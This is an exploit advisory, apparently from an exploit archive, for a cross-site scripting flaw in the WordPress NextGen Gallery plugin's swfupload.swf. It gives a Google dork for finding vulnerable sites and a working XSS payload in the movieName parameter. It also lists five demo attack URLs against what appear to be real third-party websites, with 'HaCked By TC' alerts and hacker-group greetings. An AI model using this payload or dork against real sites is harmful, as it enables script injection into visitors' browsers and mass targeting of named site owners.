WordPress NextGen Gallery Cross Site Scripting

`[+] Author: TUNISIAN CYBER  
[+] Exploit Title: WordPress NextGen (swfupload.swf) Cross Site Scripting vulnerability  
[+] Date: 09-01-2014  
[+] Category: WebApp  
[+] Google Dork: :inurl:"/wp-content/plugins/nextgen-gallery/"  
[+] Tested on: KaliLinux  
[+} Friend's blog: www.na3il.com  
  
########################################################################################  
+Exploit:  
Wordpress PlugIn NextGen suffers from an xss vulnerability.  
+P.O.C:  
127.0.0.1/[PATH]/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
  
Demo:  
http://ludotines.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
http://lsgkerala.in/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
http://www.apollomotors.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
http://stoned-gatherings.com/WordPress3/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
http://www.coachandco.fr/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert('HaCked%20By%20TC');//  
  
./3nD  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`